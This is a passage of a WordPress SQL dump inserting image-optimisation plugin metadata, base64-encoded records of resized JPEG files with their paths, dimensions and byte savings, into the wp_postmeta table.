DEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzYwMCwidGltZSI6MTQ4MzU2Mzc5MCwiaWQiOjE3Nzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MzgsInRpbWUiOjE0ODM1NjM3OTMsImlkIjoxNzc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTMwLCJ0aW1lIjoxNDgzNTYzNzk2LCJpZCI6MTc3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYxMCwidGltZSI6MTQ4MzU2MzgwMCwiaWQiOjE3Nzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoyMDQ3LCJ0aW1lIjoxNDgzNTYzODAzLCJpZCI6MTc3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDE5LCJ0aW1lIjoxNDgzNTYzODA2LCJpZCI6MTc3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjA5LCJ0aW1lIjoxNDgzNTYzODEwLCJpZCI6MTc3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzA4LCJ0aW1lIjoxNDgzNTYzODEzLCJpZCI6MTc3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTA1MCwidGltZSI6MTQ4MzU2MzgxNiwiaWQiOjE3Nzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItOTB4OTAuanBnIiwicmVkdWN0aW9uIjozNzgsInRpbWUiOjE0ODM1NjM4MjAsImlkIjoxNzc4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29200, 1777, 'wpfc_optimisation_reduction', '26066'); 
INSERT INTO `wp_postmeta` VALUES (29201, 1777, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjM4MjQsImlkIjoiMTc3NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzk1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4OTIsInRpbWUiOjE0ODM1NjM4MjgsImlkIjoxNzc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc5NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc5NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc5NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjk4NSwidGltZSI6MTQ4MzU2MzgzMSwiaWQiOjE3Nzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzk1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjU0LCJ0aW1lIjoxNDgzNTYzODM0LCJpZCI6MTc3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03OTUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTI5NDQsInRpbWUiOjE0ODM1NjM4MzgsImlkIjoxNzc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc5NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc5NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc5NS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjA5LCJ0aW1lIjoxNDgzNTYzODQyLCJpZCI6MTc3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03OTUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNywidGltZSI6MTQ4MzU2Mzg0NSwiaWQiOjE3Nzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzk1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NzksInRpbWUiOjE0ODM1NjM4NDgsImlkIjoxNzc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc5NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc5NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc5NS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg2OSwidGltZSI6MTQ4MzU2Mzg1MiwiaWQiOjE3Nzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03OTUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQyMywidGltZSI6MTQ4MzU2Mzg1NSwiaWQiOjE3Nzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03OTUtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU5MiwidGltZSI6MTQ4MzU2Mzg1OCwiaWQiOjE3Nzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03OTUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0MCwidGltZSI6MTQ4MzU2Mzg2MiwiaWQiOjE3Nzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03OTUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk3MSwidGltZSI6MTQ4MzU2Mzg2NSwiaWQiOjE3Nzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03OTUtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzk1LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03OTUtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTEsInRpbWUiOjE0ODM1NjM4NjksImlkIjoxNzc3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29202, 1776, 'wpfc_optimisation_reduction', '28136'); 
INSERT INTO `wp_postmeta` VALUES (29203, 1776, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjM4NzMsImlkIjoiMTc3NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzg1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDA1LCJ0aW1lIjoxNDgzNTYzODc3LCJpZCI6MTc3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODUtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMzODgsInRpbWUiOjE0ODM1NjM4ODAsImlkIjoxNzc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4NS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4NS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4NS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MzAyNCwidGltZSI6MTQ4MzU2Mzg4MywiaWQiOjE3NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4NS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzg1LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzNzUzLCJ0aW1lIjoxNDgzNTYzODg3LCJpZCI6MTc3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODUtMjUweDI1MC5qcGciLCJ3aWR0aCI6M